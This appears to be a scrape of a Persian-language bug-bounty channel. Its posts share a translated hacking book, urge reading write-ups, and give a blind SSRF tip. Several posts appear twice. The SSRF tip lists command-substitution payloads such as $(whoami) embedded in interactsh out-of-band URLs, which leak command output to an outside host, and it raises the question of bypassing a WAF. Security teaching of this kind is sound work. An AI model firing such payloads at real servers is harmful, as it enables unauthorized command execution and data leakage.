zseanos-methodologyـPersian.pdf
3.6 MB
🔥18👏4😍2⚡1
درود امیدوارم حالتون خوب باشه
همونطور که میدونید یکی از کتاب هایی که توی رودمپ یاد گیری وب هکینگ هست مخصوصا توصیه شده برای هانترها کتاب Real-World Bug Hunting _ Peter Yaworski هست. بعد از مدتی این کتاب رو بلاخره آماده کردم میخواستم چاپش کنم ولی خب بنا به دلایلی نشد که علتش رو هم توی کتاب توضیح دادم.
امیدوارم این کتاب مفید باشه براتون.
همونطور که میدونید یکی از کتاب هایی که توی رودمپ یاد گیری وب هکینگ هست مخصوصا توصیه شده برای هانترها کتاب Real-World Bug Hunting _ Peter Yaworski هست. بعد از مدتی این کتاب رو بلاخره آماده کردم میخواستم چاپش کنم ولی خب بنا به دلایلی نشد که علتش رو هم توی کتاب توضیح دادم.
امیدوارم این کتاب مفید باشه براتون.
🔥12
چرا باید رایتاپ بخونیم؟
خوندن ۵۰ تا رایتاپ مثل اینه که ۵۰ هکر حرفهای رو دعوت کنی کنار دستت بشینن و هر کدوم ذهنشون رو جلوت باز کنن. با هر رایتاپ، یه تیکه از درک و تجربهشون رو برمیداری و به روش خودت اضافه میکنی. نتیجه؟ چشمای تربیتشدهای که جزئیاتی رو میبینه که قبلاً هرگز به چشم نمیاومد و این دقیقاً همون چیزیه که یه باگهانتر حرفهای رو از بقیه جدا میکنه.
خوندن ۵۰ تا رایتاپ مثل اینه که ۵۰ هکر حرفهای رو دعوت کنی کنار دستت بشینن و هر کدوم ذهنشون رو جلوت باز کنن. با هر رایتاپ، یه تیکه از درک و تجربهشون رو برمیداری و به روش خودت اضافه میکنی. نتیجه؟ چشمای تربیتشدهای که جزئیاتی رو میبینه که قبلاً هرگز به چشم نمیاومد و این دقیقاً همون چیزیه که یه باگهانتر حرفهای رو از بقیه جدا میکنه.
👍39❤4
توی تست های blind ssrf شما جواب رو به صورت مستقیم نمیتونید ببینید باید از یه سرویس out of band کمک بگیرید تا بفهمید آیا سرور درخواست شما رو اجرا کرده یا نه.
برای دریافت پاسخ های out of band میتونید از
استفاده کنید.
این سه تا دستور رو توی تست های blind ssrf بیارید. میتونید باهاش دستورات سیستم عاملی اجرا کنید.
Text Payloads:
در نهایت باید پیلودتون شبیه به این باشه
Text Payloads:
کافیه این آدرس رو توی هر ورودی که مشکوک به ssrf هست بزنید و منتظر باشید در صورت آسیب پذیر بودن پاسخ توی داشبورد interactsh نمایش داده بشه
حالا یه سوال اگر waf به کلمه whoami یا کاراکتر هایی که داره باهاش ارسال میشه حساس باشه و درخواست رو بلاک کنه راهی برای دور زدنش هست؟
برای دریافت پاسخ های out of band میتونید از
https://app.interactsh.com
استفاده کنید.
این سه تا دستور رو توی تست های blind ssrf بیارید. میتونید باهاش دستورات سیستم عاملی اجرا کنید.
Text Payloads:
`whoami`
$(whoami)
${USER}
در نهایت باید پیلودتون شبیه به این باشه
Text Payloads:
https://`whoami`.wovpawxjsgngqywkn[.]oast[.]fun
https://$(whoami).wovpawxjsgngqywkn.oast.fun
https://${USER}.wovpawxjsgngqywkn.oast.fun
کافیه این آدرس رو توی هر ورودی که مشکوک به ssrf هست بزنید و منتظر باشید در صورت آسیب پذیر بودن پاسخ توی داشبورد interactsh نمایش داده بشه
حالا یه سوال اگر waf به کلمه whoami یا کاراکتر هایی که داره باهاش ارسال میشه حساس باشه و درخواست رو بلاک کنه راهی برای دور زدنش هست؟
👍9